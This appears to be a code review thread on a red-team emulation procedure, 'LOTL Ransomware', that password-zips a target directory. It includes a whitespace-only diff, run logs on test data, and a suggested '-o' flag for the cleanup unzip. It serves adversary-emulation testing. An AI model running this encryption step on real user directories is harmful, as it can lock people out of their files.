ttps/impact/lotl-ransomware/lotl-ransomware.yaml

```diff
@@ -27,8 +27,8 @@ steps:
   - name: encrypt_dir
     description: Encrypt provided directory
     inline: |
-      zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }}  
-      
+      zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }}
+
     cleanup:
       inline: |
         unzip -P {{ .Args.encryption_key }} ttpforge.zip
```

Comment:
If we're not removing the initial directory post encryption, go ahead and add an `-o` flag into the cleanup step so that it doesn't throw an error when overwriting the existing files (`unzip -o -P {{ .Args.encryption_key }} ttpforge.zip`). 

Before: 
```bash
ttpforge run forgearmory//impact/ltol-ransomware/lotl-ransomware.yaml    \
    --arg target_dir="./test-data"    \
     --arg encryption_key="password"
INFO    RUNNING TTP: LOTL Ransomware
INFO    ----------------------------------------
INFO    Executing Step #1: "encrypt_dir"
INFO    Description: Encrypt provided directory
INFO    [STDOUT] updating: test-data/
INFO    [STDOUT]  (stored 0%)
INFO    [STDOUT] updating: test-data/test.txt
INFO    [STDOUT]  (stored 0%)
INFO    ----------------------------------------
INFO    All TTP steps completed successfully! ✅
INFO    ========================================
INFO    CLEANING UP 1 steps of TTP: "LOTL Ransomware"
INFO    ----------------------------------------
INFO    Cleaning Up Step #1: "encrypt_dir"
INFO    [STDOUT] Archive:  ttpforge.zip
INFO    [STDERR] replace test-data/test.txt? [y]es, [n]o, [A]ll, [N]one, [r]ename:  NULL
INFO    [STDERR] (EOF or read error, treating as "[N]one" ...)
ERROR   error cleaning up step: exit status 1
ERROR   will continue to try to cleanup other steps
INFO    ----------------------------------------
INFO    Finished Cleanup Successfully ✅
```

After:
```bash
ttpforge run forgearmory//impact/ltol-ransomware/lotl-ransomware.yaml     \ 
     --arg target_dir="./test-data"  \
     --arg encryption_key="password"
INFO    RUNNING TTP: LOTL Ransomware
INFO    ----------------------------------------
INFO    Executing Step #1: "encrypt_dir"
INFO    Description: Encrypt provided directory
INFO    [STDOUT] updating: test-data/
INFO    [STDOUT]  (stored 0%)
INFO    [STDOUT] updating: test-data/test.txt
INFO    [STDOUT]  (stored 0%)
INFO    ----------------------------------------
INFO    All TTP steps completed successfully! ✅
INFO    ========================================
INFO    CLEANING UP 1 steps of TTP: "LOTL Ransomware"
INFO    ----------------------------------------
INFO    Cleaning Up Step #1: "encrypt_dir"
INFO    [STDOUT] Archive:  ttpforge.zip
INFO    [STDOUT]  extracting: test-data/test.txt      
INFO    [STDOUT] 
INFO    ----------------------------------------
INFO    Finished Cleanup Successfully ✅
```

Reply:
Fixed